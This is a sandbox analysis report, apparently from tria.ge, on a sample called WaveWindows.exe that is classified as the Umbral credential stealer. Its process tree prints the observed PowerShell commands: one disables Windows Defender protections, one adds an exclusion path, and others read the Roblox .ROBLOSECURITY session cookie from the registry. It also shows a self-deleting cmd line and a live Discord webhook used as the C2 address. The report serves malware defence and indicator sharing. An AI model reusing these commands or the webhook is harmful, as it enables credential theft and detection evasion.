Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Wave/LICEN...m.html

windows7-x64

3

Wave/LICEN...m.html

windows10-2004-x64

3

Wave/WaveWindows.exe

windows7-x64

10

Wave/WaveWindows.exe

windows10-2004-x64

10

Wave/d3dco...47.dll

windows10-2004-x64

1

Wave/ffmpeg.dll

windows10-2004-x64

1

Wave/libEGL.dll

windows10-2004-x64

1

Wave/libGLESv2.dll

windows10-2004-x64

1

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...dex.js

windows7-x64

3

Wave/resou...dex.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...ten.js

windows7-x64

3

Wave/resou...ten.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...dex.js

windows7-x64

3

Wave/resou...dex.js

windows10-2004-x64

3

Wave/resou...ead.js

windows7-x64

3

Wave/resou...ead.js

windows10-2004-x64

3

Wave/resou...son.js

windows7-x64

3

Wave/resou...son.js

windows10-2004-x64

3

Wave/resou...raw.js

windows7-x64

3

Wave/resou...raw.js

windows10-2004-x64

3

Wave/resou...ext.js

windows7-x64

3

Wave/resou...ext.js

windows10-2004-x64

3

Wave/resou...ded.js

windows7-x64

3

Wave/resou...ded.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Analysis

  • max time kernel
    32s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13/09/2024, 19:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Wave/WaveWindows.exe

  • Size

    27.9MB

  • MD5

    2d0703acbed8003c7afa9f08f702f251

  • SHA1

    35181a175abe31f337f1d2ec83da735d70f327fe

  • SHA256

    147c4eb6a5c1235c21a1bed6f352eb257c15747309b618e993442f04a4e613f4

  • SHA512

    aefcfbeba017b7a56edce41a8ddcd4fd6b410819ae760cdf7990a3f2e9d16654ad5587e49678cdc97e9a8f9487a568721479b1fc52b12d9a7f639d1c6a4a4c02

  • SSDEEP

    786432:07vDACrv3Fqbq0ohQivGgPQEErUlqsAN50hO:07v0eqbVwQEG89EdN50hO

Score
10/10
umbralcredential_accessdiscoveryexecutionpyinstallerspywarestealerupx

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1284109352877428746/ynYxJ7LoUnQYDiMVawzxesm3MoVdr_2vbNfl-vna_xyFrDmgWu6L7UCN0tMvtbReFJJ8

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 2 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2684
    • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:572
    • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
        3⤵
        • Views/modifies file attributes
        PID:2096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2604
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2636
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2840
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2084
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2900

      Network

      • flag-us
        DNS
        gstatic.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        216.58.204.67
      • flag-gb
        GET
        https://gstatic.com/generate_204
        BOOTSTRAPPPER.EXE
        Remote address:
        216.58.204.67:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Fri, 13 Sep 2024 19:03:57 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        BOOTSTRAPPPER.EXE
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 13 Sep 2024 19:03:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 3
        X-Rl: 42
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        BOOTSTRAPPPER.EXE
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Fri, 13 Sep 2024 19:04:01 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 27
        X-Rl: 42
      • flag-us
        DNS
        discord.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.128.233
      • 216.58.204.67:443
        https://gstatic.com/generate_204
        tls, http
        BOOTSTRAPPPER.EXE
        945 B
         4.8kB
         11
        10

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        BOOTSTRAPPPER.EXE
        310 B
         266 B
         5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        BOOTSTRAPPPER.EXE
        380 B
         510 B
         6
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.135.232:443
        discord.com
        tls
        BOOTSTRAPPPER.EXE
        391 B
         219 B
         6
        5
      • 8.8.8.8:53
        gstatic.com
        dns
        BOOTSTRAPPPER.EXE
        57 B
         73 B
         1
        1

        DNS Request

        gstatic.com

        DNS Response

        216.58.204.67

      • 8.8.8.8:53
        ip-api.com
        dns
        BOOTSTRAPPPER.EXE
        56 B
         72 B
         1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        discord.com
        dns
        BOOTSTRAPPPER.EXE
        57 B
         137 B
         1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.135.232
        162.159.136.232
        162.159.137.232
        162.159.138.232
        162.159.128.233

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
        Filesize

        17.2MB

        MD5

        43d964429554f10cd2998d9e2f3b6d2c

        SHA1

        d5310c347472b521934d05b78a3475eb9d98af88

        SHA256

        61d2874397de398da38e6dbae1317b8d555e4251dd274c28abaa24b146db920d

        SHA512

        e624f31322c4e0ac8d29913f5cad2dad6543afce03403b527169e4e03da6950b572ecaa757cb037fb97dc9abde3bcc56d46863a6bdca24b108e5193cc1f48ed4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE
        Filesize

        229KB

        MD5

        86e5ff4fe7928b5c8937d44e39898936

        SHA1

        9af8d86ebbcc235c5d39dc77f3adc7199bb46ee8

        SHA256

        f73aa033b6381ec36324947f613a7990af13f0c32cc217403fbf3d741b35b311

        SHA512

        c01f2061db11101fca739406f4a679c163d6c55fa76222e409388735db7d07bc550feccd2122d3d7f4cf19766969e3e4363bdd56330161a30ce7823c68d490e4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI20922\python310.dll
        Filesize

        4.2MB

        MD5

        384349987b60775d6fc3a6d202c3e1bd

        SHA1

        701cb80c55f859ad4a31c53aa744a00d61e467e5

        SHA256

        f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

        SHA512

        6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l1-2-0.dll
        Filesize

        21KB

        MD5

        1c58526d681efe507deb8f1935c75487

        SHA1

        0e6d328faf3563f2aae029bc5f2272fb7a742672

        SHA256

        ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

        SHA512

        8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l2-1-0.dll
        Filesize

        18KB

        MD5

        bfffa7117fd9b1622c66d949bac3f1d7

        SHA1

        402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

        SHA256

        1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

        SHA512

        b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-localization-l1-2-0.dll
        Filesize

        21KB

        MD5

        724223109e49cb01d61d63a8be926b8f

        SHA1

        072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

        SHA256

        4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

        SHA512

        19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-processthreads-l1-1-1.dll
        Filesize

        21KB

        MD5

        517eb9e2cb671ae49f99173d7f7ce43f

        SHA1

        4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

        SHA256

        57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

        SHA512

        492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-timezone-l1-1-0.dll
        Filesize

        21KB

        MD5

        d12403ee11359259ba2b0706e5e5111c

        SHA1

        03cc7827a30fd1dee38665c0cc993b4b533ac138

        SHA256

        f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

        SHA512

        9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\python310.dll
        Filesize

        1.4MB

        MD5

        90d5b8ba675bbb23f01048712813c746

        SHA1

        f2906160f9fc2fa719fea7d37e145156742ea8a7

        SHA256

        3a7d497d779ff13082835834a1512b0c11185dd499ab86be830858e7f8aaeb3e

        SHA512

        872c2bf56c3fe180d9b4fb835a92e1dc188822e9d9183aab34b305408bb82fba1ead04711e8ad2bef1534e86cd49f2445d728851206d7899c1a7a83e5a62058e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\ucrtbase.dll
        Filesize

        992KB

        MD5

        0e0bac3d1dcc1833eae4e3e4cf83c4ef

        SHA1

        4189f4459c54e69c6d3155a82524bda7549a75a6

        SHA256

        8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

        SHA512

        a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6b4189fd7bae508015035ab6d42291ad

        SHA1

        5433ec09574d5908f38727bc2e0a759acdeb4438

        SHA256

        86bfa7ca416890d61e267c47ab4276b5adda136d281657c42cf2802090328ff2

        SHA512

        f82204b3c4dbc22ddd4df095c74681cb5515409defc2ec87dbf1c91e8ee61106f6a3821bc7af2924b15acea1ca0566108099a312ad899693662b8ffccc5e849b

        Download Submit

      • \Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
        Filesize

        10.2MB

        MD5

        e04bf3d008e9ace5c8abe6b9abcf4620

        SHA1

        2b0e7f4650cf2c92dab7dc6dac458f4dd7f86bfc

        SHA256

        8d211399d7b30b3a7326d550d2883cc229f9ca7dfd77af64a5dc4dc44129e103

        SHA512

        b0cc844172ca6eec8464908066f085b122f467e93f1cd0e850a8e69e7a356e89b7255f50e873073e815b48c9124a30463247a6a20e2bd34d69963f3cf42731ec

        Download Submit

      • memory/908-272-0x000000001B750000-0x000000001BA32000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/908-273-0x0000000002410000-0x0000000002418000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1804-252-0x0000000000880000-0x00000000008C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2636-308-0x000000001B700000-0x000000001B9E2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2636-309-0x0000000001E80000-0x0000000001E88000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2684-106-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/2684-313-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/2988-279-0x000000001B550000-0x000000001B832000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2988-280-0x0000000001D70000-0x0000000001D78000-memory.dmp

        Filesize

        32KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.